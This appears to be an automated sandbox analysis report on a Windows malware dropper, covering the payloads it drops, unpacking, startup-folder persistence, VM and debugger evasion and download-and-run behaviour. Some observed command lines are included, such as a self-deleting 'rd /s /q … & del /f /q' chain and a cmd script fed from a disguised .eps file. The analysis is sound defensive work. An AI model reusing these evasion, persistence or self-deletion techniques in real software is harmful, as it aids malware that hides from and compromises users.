Source: C:\Windows\SysWOW64\makecab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe 'C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe'
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process created: C:\Users\user\AppData\Local\Temp\Murano.exe 'C:\Users\user\AppData\Local\Temp\Murano.exe' Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Process created: C:\Users\user\AppData\Local\Temp\New Feature\4.exe C:\Users\user\AppData\Local\Temp\New Feature\4.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Process created: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{515980c3-57fe-4c1e-a561-730dd256ab98}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Unpacked PE file: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack .text:ER;.data:W;.hejus:W;.tiyovo:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Unpacked PE file: 16.2.4.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 25.2.SmartClock.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 33.2.SmartClock.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Unpacked PE file: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Unpacked PE file: 16.2.4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 25.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 33.2.SmartClock.exe.400000.0.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 13_2_00406328
PE file contains an invalid checksum
Source: vpn.exe.13.dr Static PE information: real checksum: 0x11b384 should be: 0x11fc4a
Source: UAC.dll.13.dr Static PE information: real checksum: 0x0 should be: 0xde12
PE file contains sections with non-standard names
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Static PE information: section name: .hejus
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Static PE information: section name: .tiyovo
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Static PE information: section name: .new
Source: 4.exe.13.dr Static PE information: section name: .yiku
Source: 4.exe.13.dr Static PE information: section name: .padozoc
Source: 4.exe.13.dr Static PE information: section name: .new
Source: SmartClock.exe.16.dr Static PE information: section name: .yiku
Source: SmartClock.exe.16.dr Static PE information: section name: .padozoc
Source: SmartClock.exe.16.dr Static PE information: section name: .new
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0041D1BC push eax; retn 0041h 16_2_0041D1E1
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0041CA40 pushad ; retn 0041h 16_2_0041CBB9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0041BB1C pushad ; retn 0041h 16_2_0041BB45
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040A446 push ecx; ret 16_2_0040A459
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004075A2 push eax; mov dword ptr [esp], ecx 16_2_004075A7
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F577F2 push eax; mov dword ptr [esp], ecx 16_2_03F577F7
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F6B76C pushad ; retn 0041h 16_2_03F6B795
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5A696 push ecx; ret 16_2_03F5A6A9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F6C690 pushad ; retn 0041h 16_2_03F6C809
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F6CE0C push eax; retn 0041h 16_2_03F6CE31
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_004186D0 push eax; ret 18_2_004186FE
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0041D1BC push eax; retn 0041h 22_2_0041D1E1
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0041CA40 pushad ; retn 0041h 22_2_0041CBB9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0041BB1C pushad ; retn 0041h 22_2_0041BB45
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040A446 push ecx; ret 22_2_0040A459
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_004075A2 push eax; mov dword ptr [esp], ecx 22_2_004075A7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A077F2 push eax; mov dword ptr [esp], ecx 22_2_05A077F7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A1B76C pushad ; retn 0041h 22_2_05A1B795
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A1C690 pushad ; retn 0041h 22_2_05A1C809
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0A696 push ecx; ret 22_2_05A0A6A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A1CE0C push eax; retn 0041h 22_2_05A1CE31
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0041D1BC push eax; retn 0041h 25_2_0041D1E1
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0041CA40 pushad ; retn 0041h 25_2_0041CBB9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0041BB1C pushad ; retn 0041h 25_2_0041BB45
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040A446 push ecx; ret 25_2_0040A459
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_004075A2 push eax; mov dword ptr [esp], ecx 25_2_004075A7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D77F2 push eax; mov dword ptr [esp], ecx 25_2_059D77F7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059EB76C pushad ; retn 0041h 25_2_059EB795
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DA696 push ecx; ret 25_2_059DA6A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059EC690 pushad ; retn 0041h 25_2_059EC809
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059ECE0C push eax; retn 0041h 25_2_059ECE31
Source: initial sample Static PE information: section name: .text entropy: 7.87132737384
Source: initial sample Static PE information: section name: .text entropy: 7.34669656033
Source: initial sample Static PE information: section name: .text entropy: 7.34669656033

Persistence and Installation Behavior:

barindex
Contains functionality to download and launch executables
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040C561 Sleep,Sleep,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,ExitProcess,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,ShellExecuteW,ExitProcess, 0_2_0040C561
Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Murano.exe File created: C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\UAC.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Murano.exe File created: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File created: C:\Users\user\AppData\Local\Temp\Murano.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe File created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Murano.exe File created: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00409DF0 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetPrivateProfileStringW,CreateFileW,CreateFileW,CloseHandle,CloseHandle,CreateFileW,CloseHandle,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CopyFileW,CopyFileW,CopyFileW,GetFileAttributesW,GetFileAttributesW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,GetFileAttributesW,WideCharToMultiByte,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 0_2_00409DF0

Boot Survival:

barindex
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Delayed program exit found
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004011E2 Sleep,ExitProcess, 16_2_004011E2
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F51432 Sleep,ExitProcess, 16_2_03F51432
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_004011E2 Sleep,ExitProcess, 22_2_004011E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A01432 Sleep,ExitProcess, 22_2_05A01432
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_004011E2 Sleep,ExitProcess, 25_2_004011E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D1432 Sleep,ExitProcess, 25_2_059D1432
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Is looking for software installed on the system
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Registry key enumerated: More than 346 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe TID: 5856 Thread sleep time: -102511s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe TID: 1400 Thread sleep count: 40 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe TID: 3152 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe TID: 2896 Thread sleep count: 34 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040F1D0 FindFirstFileW,FindNextFileW,FindClose, 0_2_0040F1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00414650 ExpandEnvironmentStringsW,FindFirstFileW,FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW, 0_2_00414650
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0041469B FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 0_2_0041469B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00416AC0 FindFirstFileW,FindFirstFileW, 0_2_00416AC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00416C3A CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 0_2_00416C3A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040F259 FindFirstFileW,FindNextFileW,FindClose, 0_2_0040F259
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406301 FindFirstFileW,FindClose, 13_2_00406301
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 13_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040F64C FindFirstFileExW, 16_2_0040F64C
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5F89C FindFirstFileExW, 16_2_03F5F89C
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00403117 FindFirstFileW,FindClose,SetLastError,CompareFileTime, 18_2_00403117
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00408FA7 ??2@YAPAXI@Z,FindFirstFileW,FindClose, 18_2_00408FA7
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00402A0B FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 18_2_00402A0B
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00402B28 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW, 18_2_00402B28
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040F64C FindFirstFileExW, 22_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0F89C FindFirstFileExW, 22_2_05A0F89C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040F64C FindFirstFileExW, 25_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DF89C FindFirstFileExW, 25_2_059DF89C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0041A280 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,ExpandEnvironmentStringsW,Sleep,GetFileAttributesW,GetFileAttributesW,Sleep,ExpandEnvironmentStringsW,GetFileAttributesW,Sleep,GetSystemInfo,KiUserCallbackDispatcher,GlobalMemoryStatusEx,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,Sleep,ExitProcess, 0_2_0041A280
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Thread delayed: delay time: 102511 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383766722.0000000005C63000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0040A1A9
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 13_2_00406328
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004AF241 mov eax, dword ptr fs:[00000030h] 0_2_004AF241
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040E0E2 mov eax, dword ptr fs:[00000030h] 16_2_0040E0E2
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004106D5 mov eax, dword ptr fs:[00000030h] 16_2_004106D5
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5092B mov eax, dword ptr fs:[00000030h] 16_2_03F5092B
